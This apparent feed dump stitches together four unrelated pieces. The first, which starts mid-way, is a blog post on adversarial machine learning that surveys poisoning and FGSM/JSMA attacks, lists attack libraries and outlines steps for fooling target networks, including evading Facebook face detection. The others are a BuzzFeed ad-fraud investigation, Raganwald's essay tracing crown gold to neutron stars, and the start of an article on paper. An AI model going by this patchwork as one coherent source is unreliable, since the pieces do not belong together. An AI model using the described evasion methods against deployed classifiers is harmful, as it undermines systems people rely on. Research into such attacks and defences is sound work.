In 2013, following other interesting research on the topic Batista Biggio and several other researchers released a paper on Support Vector Machine (or SVM) poisoning attacks. The researchers were able to show they could alter specific training data and essentially render the model useless against targeted attacks (or at least hampered by the poor training). I highly recommend Biggio's later paper on pattern-based classifiers under attack and he has many other publications related to techniques to attack and prevent attacks on ML models.

Example poisoning attack

Photo: Example poisoning attack on a biometric dataset

In 2014, Christian Szegedy, Ian Goodfellow and several other Google researchers released their paper Intriguing Properties of Neural Networks which outlined techniques to calculate carefully crafted perturbations of an image allowing an adversary to fool a neural network into misclassifying the image. Ian Goodfellow later released a paper outlining an adversarial technique called the Fast Gradient Sign Method or FGSM, one of the widely used and implemented forms of attacks on neural network classifiers.

In 2016, Nicolas Papernot and several other researchers released a new technique which utilized a Jacobian saliency map built using the Jacobian matrix of the loss function when given the input vector. He and Ian Goodfellow later released a Python open-source library called cleverhans which implements the FGSM and Jacobian Saliency Map Attacks (or JSMA).

There have been many other papers and talks related to this topic since 2014, too much to cover here, but I recommend perusing some of the recent papers from the field and investigating areas of interest for yourself.

Malicious Attacks

As mentioned previously, malicious attacks have been studied at length. Here are a few notable studies:

There are plenty more, but these give you an idea of what has been studied in the space. Of course, alongside many of these studies the authors studied counter-attacks. Security is ever a cat-mouse game so learning how to defend against these types of attacks, particularly with detection of an adversary or adversarial training is a research space in its own right.

Real-life Adversarial Examples

It has been debated whether adversarial learning will ever work for real-life objects or is just useful when the image is a static input such as an image or a file. In a recent paper, a group of researchers at MIT were able to print 3D objects which fooled a video-based Inception network into "thinking", for example, a turtle was a rifle. Their method utilized similar techniques to FGSM across a plane of possible alterations on the texture of the object itself.

How can I build my own adversarial samples?

Hopefully you are now interested in building some of your own adversarial samples. Maybe you are a machine learning practitioner looking to better defend your network, or perhaps you are just intrigued by the topic. Please do not use these techniques to mail spam or malware! Really though... don't.

Okay, ethical use covered, let's check out the basic steps you'll need to go through when building adversarial samples:

  • Pick a problem / network type
    • Figure out a target or idea. Do some research on what is used "in production" on those types of tasks.
  • Research “state of the art” or publicly available pretrained models or build your own
    • Read research papers in the space, watch talks from target company. Determine if you will build your own or use a pretrained model.
  • (optional) Fine tune your model
    • If using a pretrained model, take time to fine-tune it by retraining the last few layers.
  • Use a library: cleverhans, FoolBox, DeepFool, deep-pwning
    • Utilize one of many adversarial learning open-source tools to generate adversarial input.
  • Test your adversarial samples on another (or your target) network
    • Not all problems and models are as easy to fool. Test your best images on your local network and possibly one that hasn't seen the same training data. Then take the highest confidence fooling input and pass it to the target network.

Want to get started right away? Here are some neat tools and libraries available in the open-source world for generating different adversarial examples.

  • cleverhans: Implementations of FGSM and JSMA in Tensorflow and Keras
  • deep-pwning: Generative drivers with examples for Semantic CNN, MNIST and CIFAR-10
  • FooxBox: Implementations of many algorithms with support for Tensorflow, Torch, Keras and MXNet
  • DeepFool: Torch-based implementation of the paper DeepFool (less detectable FGSM)
  • Evolving AI Lab: Fooling: Evolutionary network for generating images that humans don't recognize but networks do, implemented in Caffe
  • Vanderbuilt's adlib: sci-kit learn based fooling and poisoning algorithms for simple ML models.

There are many more, but these seemed like a representative sample of what is available. Have a library you think should be included? Ping me or comment!

Benevolent Uses of Adversarial Samples (a proposal)

I see the potential for numerous benevolent applications of these same techniques. The first idea that came to mind for me was facial recognition for surveillance technology (or simply when you want to post a photo and not have it recognize you).

Face Recognition

To test the idea, I retrained the final layers of the Keras pre-trained Inception V3 model to determine if a photo is a cat or a human. It achieved 99% accuracy in testing.2 Then, I utilized the cleverhans library to calculate adversaries using FGSM. I tried varying levels of epsilon, uploading each to Facebook. At low levels of perturbations, Facebook immediately recognized my photo as my face and suggested I tag myself. When I reached .21 epsilon, Facebook stopped suggesting a tag (this was around 95% confidence from my network that the photo was of a cat).

me as a cat

[Photo: me as a cat]

The produced image clearly shows perturbations, but after speaking with a computer vision specialist, Irina Vidal Migallon3, it is possible Facebook is also using the Viola-Jones statistics-based face detection or some other statistical solution. If that is the case, it's unlikely we would be able to fool it using a neural network with no humanly visible perturbations. But it does show that we can use a neural network and adversarial learning techniques to fool face detection.4

Steganography

I had another idea while reading a great paper which covered using adversarial learning alongside evolutionary networks to generate images which are not recognizable by humans but are convincing to a neural network with 99% accuracy. My idea is to apply this same image generation as a form of steganography.

MNIST generated images

Photo: Generated Images from MNIST dataset which the model classifies with high confidence as digits

In a time where it seems data we used to consider private (messages to friends a family on your phone, emails to your coworkers, etc), can now be used to either sell you advertising or be inspected by border agents, I liked the idea of using an adversarial Generative Adversarial Network (or GAN) to send messages. All the recipient would need is access to training data and some information about the architecture. Of course, you could also send the model if you can secure the method you are sending it. Then the recipient could use a self-trained or pretrained model to decode your message.

Some other benevolent adversarial learning ideas

Some other ideas I thought would be interesting to try are:

  • Adware “Fooling”
    • Can you trick your adware classifiers into thinking you are a different demographic? Perhaps keeping predatory advertising contained...
  • Poisoning Your Private Data
    • Using poisoning attacks, can you obscure your data?
  • Investigation of Black Box Deployed Models
    • By testing adversarial samples, can we learn more about the structure, architecture and use of ML systems of services we use?
  • ??? (Your Idea Here)

I am curious to hear others ideas on the topic, so please reach out if you can think of an ethical and benevolent application of adversarial learning!

A Call to Fellow European Residents

I chose to speak on the #34c3 Resiliency track because the goal of the track resonated with me. It asked for new techniques we can use in a not-always-so-great world we live in so that we can live closer to the life we might want (for ourselves and others).

For EU residents, the passage and upcoming implementation of the General Data Protection Regulation (or GDPR) means we will have more rights than most people in the world regarding how corporations use, store and mine our data. I suggest we use these rights actively and with a communal effort towards exposing poor data management and predatory practices.

In addition, adversarial techniques greatly benefit from more information. Knowing more about the system you are interacting with, knowing about possible features or model-types used will give you an advantage when crafting your adversarial examples.5 In GDPR, there is a section which has been often cited as a "Right to an Explanation." Although I have covered that this is much more likely to be enforced as a "Right to be Informed," I suggest we EU residents utilize this portion of the regulation to inquire about use of our data and automated decisions via machine learning at companies whose services we use. If you live in Europe and are concerned how a large company might be mining, using or selling your data, GDPR allows you more rights to determine if this is the case. Let's use GDPR to the fullest and share information gleaned from it with one another.

A few articles of late about GDPR caught my eye. Mainly (my fellow) Americans complaining about implementation hassles and choosing to opt-out. Despite the ignorant takes, I was heartened by several threads from other European residents pointing out the benefits of the regulation.

I would love to see GDPR lead to the growth of privacy-concerned ethical data management companies. I would love to even pay for a service if they promised to not sell my data. I want to live in a world where the "free market" system then allows for ME as a consumer to choose someone to manage my data who has similar ethical views on the use of computers and data.

If your startup, company or service offers these types of protections, please write me. I am excited to see the growth of this mindset, both in Europe and hopefully worldwide.

My Talk Slides & Video

If you are interested in checking out my slides, here they are!

The talk will be recorded and I will follow up by posting the video here!

Slide References (in order)

Publishers Bought Millions of Website Visits They Found Out Were Fraudulent

$
0
0

This summer, Ozy.com, a news site that’s raised more than $35 million in funding from high-profile investors, published a group of articles in an ongoing series about how companies and entrepreneurs are trying to be a positive force in their communities. The content was created as part of a partnership with JPMorgan Chase, whose logo appears on each article.

The stories appeared to be a big hit: Between May and October, the sponsored content ranked among Ozy’s most-viewed articles, according to traffic data from analytics service SimilarWeb.

It’s the kind of success a publisher and brand would celebrate — except that the vast majority of traffic to the articles was in fact fraudulent, according to ad industry standards. Those stories, as well as other Ozy articles that carried ads from Amazon and Visa, received traffic that was purchased and delivered via a system that automatically loads specific webpages and redirects traffic between participating websites to quickly rack up views without any human action.

JPMorgan told BuzzFeed News it had no idea its sponsored content was receiving paid traffic from the source in question, and Ozy said it believed the audience was valid when it purchased it. Ozy has since told the bank that the resulting traffic was not counted as part of the campaign.

“We’re committed to only working with reputable and brand-safe publishers, and we don’t take this sort of thing lightly,” Erich Timmerman, a JPMorgan spokesperson, told BuzzFeed News.

The incident is the latest glimpse at the roots of a crisis of trust in online publishing. Blue-chip advertisers increasingly doubt whether their online ad spending reaches real audiences, and JPMorgan in particular has taken steps to ensure its ads only appear on quality sites. But even quality sites present risks.

Working in collaboration with ad-fraud consultancy Social Puncher, BuzzFeed News identified several other reputable publishers who also received the same invalid traffic during a similar timeframe as Ozy. They include Funny or Die, a video comedy site founded by actor Will Ferrell and several Hollywood producers; Community Newspaper Holdings Inc., a publisher of local newspapers in more than 20 states, which receives the traffic as part of a deal with video company Tout; Bustle Digital Group, a fast-growing digital publisher focused on young women; and PCMag, the venerable computing publication. All except CNHI say they have stopped using the traffic in question.

The audience delivery system used by these publishers was first detailed in an October BuzzFeed News investigation that revealed how subdomains on Myspace and more than 150 newspaper websites belonging to GateHouse Media generated massive amounts of fraudulent video views and ad impressions. (Both companies blamed partners who operated the offending subdomains and said they did not profit from fraudulent views or ads. They shut down the subdomains.)

How the system generates traffic through redirects between websites.

An estimated $16 billion will be lost to ad fraud this year, and a significant portion of that will go to criminals who use bots and other nefarious means to siphon money out of the digital ad ecosystem. But this example shows how legitimate publishers contribute to fraud when they knowingly or unknowingly use invalid traffic and other illegitimate means to grow their audiences and increase ad revenue.

“Illegitimate traffic sourcing occurs when a publisher pays a traffic supplier for a fixed number of visits to their website,” said a recent white paper about ad fraud published by the Alliance for Audited Media, a not-for-profit media auditing organization. “Publishers often buy traffic at the end of the month or quarter to ‘make its numbers.’ Traffic sellers often promise the publisher that the traffic is human and will pass through all ad fraud detection filters.”

Got a tip about ad fraud? You can email tips@buzzfeed.com. To learn how to reach us securely, go to tips.buzzfeed.com.

In the case of Ozy, it subsequently told JPMorgan it used the paid traffic to try to grow an email subscription list, according to a source with knowledge of conversations between the companies.

BuzzFeed News provided Ozy with a detailed list of questions, in addition to video evidence showing how JPMorgan articles, as well as other content featuring premium ad units from Amazon and Visa, were receiving fraudulent traffic. The company replied with an emailed statement.

“We're always testing new ways to share our quality content with new, premium audiences. Unfortunately, our digital ecosystem harbors audience sources that don't always fit OZY's target, and in some cases, exhibit behavior that is not authentic,” the statement said. “We are constantly monitoring our network for fraudulent activity, and immediately suspend any traffic sources that would devalue OZY and our partnerships.”

The statement concluded, “We are proud to consistently overdeliver for our advertising partners across platforms, and it goes without saying that our partners only pay for quality delivery.”

As with Myspace, GateHouse, and Ozy, all publishers contacted by BuzzFeed News said they had no idea there were issues with the traffic in question, and that it was deemed safe by different third-party verification companies. Some publishers ceased using the traffic after reading the BuzzFeed News article that revealed its origins, the system generating automated redirects, and the fact that verification company DoubleVerify deemed it fraudulent after a detailed investigation. Prior to that, it appears the publishers did not investigate the origin of the traffic they sourced for their websites.

Mike Zaneis leads the Trustworthy Accountability Group, an ad industry initiative to fight fraud. He said a publisher is ultimately responsible for what happens on their site, and they need to engage in proper due diligence and monitoring.

“Publishers have a responsibility here to monitor their websites. If you see wild spikes in traffic coming from strange places, or at strange times, you have a responsibility there,” he told BuzzFeed News.

Sourcing traffic from ScreenRush

Ozy displays all the hallmarks of a premium digital publisher. But along with the illegitimate traffic going to JPMorgan’s and other content, data from SimilarWeb shows Ozy recently bought a portion of its audience from low-quality sources, including ad networks that specialize in pop-under browser windows that are opened on users as they visit other websites.

Ozy employs journalists to create content and says on its website that it reaches an aggregate of 40 million people a month through various channels. Data from Quantcast, a service Ozy uses to measure its traffic, says its website reaches 2.5 million people per month. Ozy also works with partners to syndicate its content and produces a TV show for PBS, among other non-web-based efforts. The PBS show is hosted by Ozy cofounder Carlos Watson, a former CNN commentator and MSNBC host who had a previous career as an entrepreneur.

Ozy’s investors include Silicon Valley luminaries Laurene Powell Jobs, Ron Conway, and David Drummond, a senior vice president of Alphabet, Google’s parent company. Ozy also received a $20 million investment from German media conglomerate Axel Springer in 2014. Earlier this year it raised an additional $10 million from GSV Capital Corp.

A few months after closing its latest financing, Ozy.com started receiving a significant increase in desktop visitors. Between June and October, roughly 2 million visits came from domains connected to a company called ScreenRush, according to SimilarWeb. This traffic was sent to specific articles on Ozy, many of which were part of the JPMorgan-sponsored content campaign. Other articles receiving visits via ScreenRush displayed special video ad units from Amazon and Visa, according to video compiled by ad-fraud consultancy Social Puncher. (BuzzFeed News contacted Visa and Amazon for comment but did not receive a reply.)

Using SimilarWeb, BuzzFeed News examined the most-popular content on Ozy between June and October and found that 8 of the 10 most-popular article pages received the vast majority of their visits using URLs that attributed the traffic to ScreenRush. For example (emphasis added):

This was also the case for an article on Ozy written by the head of property management for JPMorgan Chase Global Real Estate. These ScreenRush URLs accounted for nearly all traffic to the JPMorgan-sponsored content.

Vlad Shevtsov, director of investigations for Social Puncher, said his team documented behavior on Ozy that saw ScreenRush load and remain on a page for 90 seconds before the system automatically redirected to the next domain in the scheme.

"This is not sophisticated artificial traffic, just a dumb programming script," he said in an email. "The first question about these visits should be, How is it even possible that visitors went to other ScreenRush client sites if Ozy's pages have no links to any of these other sites?"

As detailed in the previous BuzzFeed investigation, the traffic ScreenRush sent to publishers largely originated from a group of more than 20 websites that purport to be online arcades. These sites all use the same design template and had their domains registered around the same time. The arcade sites also have nearly identical traffic patterns, as they are redirecting the same audience among them before passing it along to domains owned by ScreenRush — which, in turn, sends the traffic to publisher clients. (This method of redirecting traffic through domains to obscure its origins was detailed in a more recent BuzzFeed News story.)

Separate investigations by DoubleVerify and Social Puncher both determined the traffic coming from ScreenRush meets industry definitions for invalid, fraudulent traffic. They documented automated redirects being triggered by ScreenRush’s code without any human action on the page, as well as the presence of multiple video players running simultaneously.

“You’ve got websites that are getting some sort of inbound traffic and then this begins a cycle of autoplaying videos with ad pages refreshing and sometimes redirecting to other pages,” Roy Rosenfeld, DoubleVerify’s vice president of product management, previously told BuzzFeed News.

Instead of using video players to generate ad impressions, ScreenRush traffic was directed to Ozy pages that were part of specific campaigns. A spokesperson for DoubleVerify told BuzzFeed News it identified invalid traffic and ad impressions on a portion of Ozy’s users during the period the site received ScreenRush traffic.

Daniel Aharonoff, the general manager of ScreenRush, disputed the conclusions of DoubleVerify and Social Puncher, and the reporting of BuzzFeed News. He said the traffic coming through his system passes the filters of multiple verifications companies and is therefore human and valid.

“In all cases, the traffic is pre-screened by the ad-verification service chosen by the advertiser, and must be approved as valid in order to be delivered, so neither I nor any of the clients had any reason to believe the traffic wasn’t valid, at least until your article came out saying that DV had a different opinion on certain supply partners,” he said in an email.

He said the redirects documented by DoubleVerify and Social Puncher (as shown in the above video) are in fact the result of a real-time bidding process that determines which site the traffic goes to next, and that the content is shown to engaged, human users.

"We have a range of methods that assure us that supply is coming from 'real humans' and that the content discovery experience is in full 'viewability,'" he said. "Inherently this means if a 'user' wants to opt out they can 'simply' close the browser window that is present."

Aharonoff offered a lengthy email response and his explanation of the activity shown in the Social Puncher video. It can be read in full here. He also said BuzzFeed News and DoubleVerify are unfairly targeting his company.

“You are managing more than anything to scare partners with this singular view by DV which is hardly the industry standard,” Aharonoff said. He added that DoubleVerify is “clearly striving for relevance in a market dominated by their core competitors such as Moat & IAS among several others including various new entrants in the market.”

Moat did not reply to questions from BuzzFeed News about ScreenRush traffic, but did note that a website connected to Aharonoff’s company incorrectly claims it is a Moat customer. IAS also said its logo was improperly listed on that site. It also said it flagged several domains used by ScreenRush to refer traffic to clients for “high brand risk.”

Ozy stopped working directly with ScreenRush at the end of October. The next month, the site experienced a significant drop in desktop referral traffic, according to SimilarWeb. With ScreenRush gone, Ozy’s November traffic sources included ad networks that specialize in selling traffic generated via pop-under windows, according to SimilarWeb. These windows open behind the main browsing window as a user accesses the desired content. Publishers pay to have their content loaded in this pop-under window in the hope that the user will eventually see it. A recent BuzzFeed News story detailed how this form of low-quality traffic is often “laundered” through other domains before ending up on mainstream sites.

Ozy did not respond to a question about the use of pop-unders to generate traffic. It also didn't comment on the fact that until November it was also buying audience via go.bistroapi.com, a traffic source that Social Puncher investigated and found to be selling fake traffic to a variety of publishers.

Funny or Die and other sites got traffic, too

At the same time ScreenRush traffic was flowing to Ozy, it was also being directed to pages on funnyordie.com that featured branded content for clients such as KFC and Showtime.

Between July and October, SimilarWeb shows funnyordie.com received close to 900,000 desktop visits via ScreenRush. The comedy site was also a longtime purchaser of traffic from go.bistroapi.com, the highly suspect source that was also used by Ozy. Forensiq, an ad-fraud detection firm, told BuzzFeed News it detected high levels of nonhuman traffic on funnyordie.com over the summer.

In response to questions about its use of ScreenRush and go.bistroapi.com, Funny or Die’s head of public relations, Carolyn Prousky, sent an email statement.

“Once we found out there were discrepancies between our verification source and another report we discontinued the service as a precaution, though it was still passing other 3rd party verification sources as valid,” she said.

Prousky did not respond to a follow-up question about the use of ScreenRush traffic on branded campaign pages.

Romper.com, which is owned by Bustle Digital Media, also cited “discrepancies” as a reason for halting a test of ScreenRush traffic.

A company spokesperson said ScreenRush traffic wasn't registering properly in some of the site’s analytics systems, so they stopped using the traffic. Before Romper discontinued ScreenRush at the end of September, it was responsible for more than 90% of the site’s desktop referral traffic during the test, according to SimilarWeb.

One publisher that continues to receive ScreenRush traffic is CNHI, which owns more than 100 small newspapers in the US. It partnered with Tout to provide video on its sites, and Tout sources some traffic from ScreenRush for those videos.

Trinh Bui, Tout’s vice president of client services, told BuzzFeed News that ScreenRush traffic continues to pass third-party traffic filters. He said Tout turned off one traffic source in the wake of the BuzzFeed News story about Myspace and GateHouse after it tested high for invalid traffic.

As for the presence of automated redirects and multiple video players on the page, Bui said, “We expect the user to have a choice to watch videos or exit the video experience when they wish. When issues are flagged by partners or users, we immediately investigate the issues and work to resolve them as quickly as possible.”

CNHI did not respond to a request for comment.

A final prominent publisher that briefly used ScreenRush is pcmag.com. In the course of its initial reporting on ScreenRush, BuzzFeed News provided a list of ScreenRush domains to Augustine Fou, an independent ad-fraud researcher, so he could make an assessment of the system on his own. (He agreed with the conclusions of DoubleVerify and Social Puncher that the ScreenRush system generated fraudulent views and impressions.)

After clicking on an unrelated ad on a site in the ScrenRush scheme, Fou soon found his browser being redirected to an article page on pcmag.com. That page began loading and reloading what Fou called “a really malicious stack of redirects.” He documented the behavior in a video he uploaded to YouTube.

BuzzFeed News shared the video with PCMag at the time.

“We're taking this very seriously and have paused the ScreenRush test, as we conduct a deeper investigation,” a PCMag spokesperson wrote in a statement provided to BuzzFeed News. “PCMag has only recently and very sparingly been testing content recommendation services, which represent less than 1% of our traffic.”

When informed of PCMag’s statement and the activity that led to it, Aharonoff was nonplussed.

“It's unfortunate that [they] took that position,” he said in an email. “They onboarded, asked for KPIs we specifically delivered on which is the [time on site] you precisely saw. They are correct in that their buy was very insignificant, enough for you to buy my lunch at a not so fancy kosher restaurant.”


Got a confidential tip? Submit it here.


How Raganwald Lost His Crown

$
0
0

This is the legend of “How Raganwald Lost His Crown.” Attend closely, for it contains within it, the answers of many of the riddles of the universe. And in the telling and retelling of this story, we are reminded of our place upon our earth and within the firmament of the heavens.


the story of the first star

A very, very long time ago, there was a star. It was much more massive than the star that lights our sky, maybe ten or twenty times as massive. It shone for a very long time, its spent nuclear fuel forming a great, iron-rich core. The nuclear fuel within this core burned out first, and the core shrunk until the only thing preventing it from further collapse was electron-degeneracy pressure, the quantum resistance of electrons from occupying the same place and state.

As the star surrounding the core continued to burn, it deposited even more mass upon the core, and then suddenly the gravitational force overcame the electron-degeneracy pressure and the core collapsed even further. An enormous amount of energy was released, heating it to the point where the iron atoms disintegrated into alpha particles.

The temperature continued to rise, and these alpha particles captured the electrons, forming neutrons, releasing neutrinos in a great wave. The neutrons packed together more tightly, forming a much smaller, hyper-dense neutron sphere. Meanwhile, the blast of neutrinos blew what was left of the active shell surrounding the core into a supernova.

We did not see the supernova.

Neither did the dinosaurs, nor any other life on earth. Although it happened far away from where we are now, this happened so long ago that its visible light passed this place long before our star was even born.


The Crab Nebula


the neutron star

What remained behind was a neutron star. Its mass was maybe twice that of our sun, packed into a sphere perhaps 20 kilometers across. Very massive, but not enough for gravity to collapse it even further and create a black hole. But very massive!

It would be impossible to stand on its surface, but if somehow I travelled back in time, and if somehow I travelled to this neutron star, and if somehow I weighed myself, I would have found that while my scale tells me that I am about 86 kilograms on Earth, I would have weighed 8.6 trillion kilograms on this neutron star.

If I decided that this weight was not to my liking and I wanted to fly away, I would have needed to accelerate to as much as half the speed of light to escape its gravity well.

The gravity was so strong that if I was standing on the surface (impossibly!), and was wearing a headlamp for illumination, I would have been able to see all the way around the nutron star to the other side, because its gravity would have bent light into a semi-circle. I might have lifted my Apple Watch and said “Hey Siri, record a note.” If I was using the Apple Neutron Star Edition Apple WatchOS, it would have had to correct for time dilation between time at my waist and time at my shoulder.

There are many other incredibly interesting things about neutron stars. They spin. They emit beacons of x-ray energy that sometimes fall upon our earth in regular pulses, creating “pulsars.” The remnants of the supernova that they created may envelop them creating a “nebula” that they illuminate with their energy.

One such nebula is the Crab Nebula, pictured above.


Gravitational Waves


the collision

Neutron stars do not hang, fixed in space. Nothing really does. Gravity and momentum moves everything around in the dance of the heavens. And from time to time, a neutron star encounters another. Their massive gravities pull them towards each other. They may bend their paths and then continue on their way. They may wind up forming a binary system. Or they may actually collide.

When they collide, a massive gravitational wave is created. Gravitational waves were first proposed by Henri Poincaré in 1905, but most people associate them with Albert Einstein, who predicted them ten years later within the framework of his General Theory of Relativity, one of the great human intellectual achievements. Humans have been looking for evidence of gravitational waves ever since, but it was almost exactly 100 years later, in 2015, that we detected them, and the results were announced in early 2016.

In August of 2017, the Laser Interferometer Gravitational-Wave Observatory detected a gravitational wave, GW170817, produced by two neutron stars spiralling together just before they collided. When neutron stars merge, they are thought to either create a newer, more massive neutron star, or a black hole if their combined masses are large enough.

But there is more to the story than that. As noted, their spiralling together creates gravitational waves. A massive magnetic field, trillions of times stronger than that of Earth, is created in milliseconds. And kilonovae occur, gamma ray bursts and electromagnetic radiation from material that decays as it is ejected from the merging neutron stars.

Kilonovae are very interesting. The neutrons in neutron stars are held together by gravity. But material ejected in the cataclysmic merger is no longer held together by gravity. It “decays” back into ordinary matter.


gold


heavy metal

Physicists have long been interested in heavy metals like gold. The “normal” fusion process within a star does not create substances like gold. The abundance of such metals on Earth puzzled humans. Astrophysicists realized that one way heavy metals might be created would be if an extremely large star, like a red giant, contained lots of iron created from fusion. As the star burns, the iron would slowly “capture” neutrons thrown off by the fusion reaction. Some of those neutrons become protons, and the iron transmutes into heavier matter, eventually creating matter like bismuth.

This process, called the s-process, or “slow” process, is thought to account for about half of the heavy materials in the Universe. But the s-process doesn’t account for even heavier substances like Uranium, nor is it thought to account for more than about half of the matter it can create.

Astronomers came up with another possibility, the r-process. What if matter ejected from events like the merger between two neutron stars decayed into elements like uranium or gold? It would take something like kilonovae to explain the amounts of materials like gold or platinum observed in the universe.

Remember gravitational wave GW170817? This was produced by the merger of two neutron stars, and unlike the four gravitational waves detected before it, it was independently observed by 70 observatories around earth as its event was accompanied by a massive amount of electromagnetic radiation.

When two black holes collide, there is no observable radiation because their gravity does not allow light to escape. Gravity waves are our only hint that anything has happened. But neutron stars are different. They are massive enough to create gravity waves, but not massive enough to prevent light from reaching us alongside the gravity waves. And that’s what happened.


Spectroscopic Observation of Gold Nanoparticles


spectroscopy

Light tells us a lot about the process that created it. Spectroscopy is the study of the interaction between matter and electromagnetic radiation. One form of spectroscopy, atomic emission spectroscopy, identifies the atomic composition of a material that gives off radiation by measuring the amplitude and frequencies of the radiation it emits.

One of the great early accomplishments in science was when astronomers, observing our Sun, noted an unknown yellow spectral line signature. In 1868, Norman Lockyer predicted that it must be created by a hitherto unknown element, which he named “Helium” after the Greek Titan of the Sun, Helios. In 1895, two Swedish chemists detected helium in ore samples here on Earth, and in the great tradition of the scientific method, we had a theory, a prediction, and a confirmation of the theory by test.

And this very year, we repeated the process. Astrophysicists had predicted that the merger of two neutron stars would create kilonovae, and that the r-process decay would produce heavy elements. And when those seventy observatories focused on the source of the gravitational wave GW170817, what did spectroscopy reveal?

Gold. And plenty of it. And other heavy materials, and plenty of them. The theory had passed its test, we knew that gold was produced when two different suns decayed to produce two neutron stars that would eventually collide. This confirmation removed yet another objection to the argument that there were things in our universe that science could not explain, that we could not as a species understand.

This was a glorious observation, and you and I were alive to witness the popping of champagne corks around the world.


LH 95 stellar nursery in the Large Magellanic Cloud


the nursery

Remember our neutron star? It wandered, it collided with another star, it ejected some of its matter, perhaps the very chunk that I had–in a thought experiment only–stood upon. It formed a new neutron star, and carried on. But what of its ejected matter?

As we noted, that decayed into various heavy elements, some of which were gold. The matter formed interstellar dust. And while some of it stayed within the gravitational field of the newly merged neutron star, some of it, propelled by the vast energies created in the merger, flew away from the neutron stars to wander, alone, in the universe.

In time, it was attracted by other matter, in a great cloud we call a nebula. At the center of this great cloud, gravity pulled the matter together into lumps. Our matter was gold, but most of the nebula was lighter elements, predominately hydrogen, the lightest element.

Gravity acted to make the lumps lumpier. They sucked nearby material into them. The gravity compressed them together, swirling and spinning, flattening into discs with a massive bump in the center. As they compressed, they heated. At a certain point, when the temperatures at the cores of these super-compressed lumps reached about 10,000 Kelvin, the hydrogen began to fuse into helium.

Stars were born. The nebula had become a nursery.


Our Sun


our sun

One of these stars was about one solar mass. Spinning around it was a huge accretion disc. Gravity within that disc made it lumpy, and the lumps coalesced into spinning spheres orbiting the star. Other lumps passing by were sucked into the star’s gravity well and took up irregular orbits. Some begin to orbit the spheres orbiting the stars, forming satellites.

The star was our sun. The third lump from the star was our earth. Our earth was compressing itself under its own gravitational field. The heaviest elements fell to its centre, just as they do in a star. A core of mostly iron formed, just like that star that would birth the neutron star. Our gold fell into it, along with lots of passing uranium.

The uranium was radioactive and decaying. This caused a chain reaction. But not the kind that explodes, there were too many other elements all together, acting like the moderating rods of a nuclear reactor. So the uranium just got hot, and it is still hot to this day. The heat of compression and of this slow burning nuclear decay turned the core to molten metal, with a solid crust on the outside.

At some point, a satellite came crashing into the earth, so hard and so fast that about a third of the earth was blasted into space. It didn’t go far–the debris formed a ring around the earth, and gravity eventually compacted it into a single satellite, our moon, but a satellite much larger than our planet’s gravity would normally be able to capture.

The iron core formed a huge magnet. An atmosphere formed. Life formed. The magnet bent electromagnetic rays such that it helped to shield life from the universe. Another shield was formed by ozone in the atmosphere. And the moon, the satellite that is much larger than would be expected for a planet our size, formed a third shield, attracting meteors and other flying debris so that extinction-event meteorites would be much more infrequent than expected.

Our world had become a nursery for life. The seas filled with creatures. Many tiny such creatures, when they died, sunk to the bottom of the seas. Their corpses piled up, eventually to be compressed into oil. Other creatures crawled onto the land, and then the land and skies filled with life. Plants developed the wood fibre lignin. For a very long time, nothing evolved to eat or break down lignin, so when trees died, they did not decay and they too, piled up and would be compressed into coal.


The Cretaceous–Paleogene extinction event


we enter the story

Life continued to evolve. The most dominant (as we define dominance in our own image) came to be the dinosaurs. Remember the extinction-event meteors that the moon was shielding us from? One got through sixty-six million years ago, the Cretaceous–Paleogene extinction event, forming the Chicxulub crater.

The dinosaurs were nearly wiped out. The survivors became avians, and the ecosystems the world over changed drastically. A small homeothermic creature that specialized in night-hunting filled the now available opportunities, multiplied, and became a minor success story.

One of its descendants walked on its hind legs and became us. We explored, grew, fought each other, became superstitious, discovered science and reason, rejected it, and fought some more. We took the bounty of coal and leveraged it into an explosion of industry and transportation. Having mastered the other creates, our dominant behaviour became manipulating each other through social engineering.

Today, the battle between superstition and science is one of the most hotly contested battlegrounds. But science hasn’t gone away. Science made it possible for us to learn this story, and us to share it in this form. Science trains our doctors and dentists. Science helps us create healthy foods, and sugary snacks that we like.


X-ray image of previously root canal treated tooth


the crown

One day, one of us humans–Raganwald–had a pain in his jaw. He went to a dentist, who used radiation to see what his eyes could not, to look into solid matter, and to see that he had an infection in the nerve of a tooth. The dentist sent him to a specialist, who drilled a hole in the top of the tooth, and then extracted the root without removing the tooth.

The specialist closed the hole with a temporary filling, and when all had healed satisfactorily, Raganwald returned to the dentist, who fitted the tooth with a crown. All was well for about twenty years, but alas, the infection returned. This time, there was nothing to do except remove the tooth.

The dentist removed Raganwald’s crown, then the tooth. Raganwald may get an implant put in to replace the lost tooth. But as a souvenir, the dentist gave Raganwald the crown to keep. “It’s gold, you can get something for it.” Yes, Raganwald could get something for it. Something more valuable than the monetary value of gold.

Here it is, Raganwald’s crown:


Raganwald's crown


the lesson

Let us look upon Raganwald’s crown:.

Do you now see the matter from a long dead star, that became a neutron star, that danced with, and then embraced, another neutron star, and in their fiery coupling, created this gold? Is this crown not the reminder of its journey from star to planet to crown to this simple plastic box–made from the oil laid down millions of years ago?

And is it not fitting that Raganwald lost his crown the very year that we humans confirmed that its gold had been forged in the collision of two neutron stars, long before our own sun began to shine? Does this not remind us of how small we are, and yet how great is our thirst for learning?

Hark to the lesson of this story: Everything has an explanation.

Some processes may take millions or billions of years to complete. Some conjectures may take a century to be confirmed. But the universe obeys laws, laws that we can discover through reason and scientific investigation. And the arc of human history bends towards reason, not ignorance and superstition.

The loss of Raganwald’s crown proves it.


(discuss on hacker news, or edit this page in your browser)

Why a ‘paperless world’ still hasn’t happened

$
0
0

Old Mohawk paper company lore has it that in 1946, a salesman named George Morrison handed his client in Boston a trial grade of paper so lush and even, so uniform and pure, that the client could only reply: “George, this is one super fine sheet of paper.” And thus Mohawk Superfine was born.

This premium paper has been a darling of the printing and design world ever since. “Superfine is to paper what Tiffany’s is to diamonds,” Jessica Helfand, co-founder of Design Observer magazine once said. “If that sounds elitist, then so be it. It is perfect in every way.”

Mohawk tells the Superfine origin story every chance it gets: on their website, in press releases, in promotional videos and in their own lush magazine, Mohawk Maker Quarterly. And now Ted O’Connor, Mohawk’s senior vice president and general manager of envelope and converting, is telling it again. He sits on an ottoman in a hotel suite on the 24th floor of what a plaque outside declares is “The Tallest Building in the World with an All-Concrete Structure”. It’s day one, hour zero of Paper2017 in Chicago, the annual three-day event at which the industry, its suppliers and its clients come together to network and engage in “timely sessions on emerging issues”. Attendees are rolling in and registering, and the Mohawk team is killing time before wall-to-wall meetings.

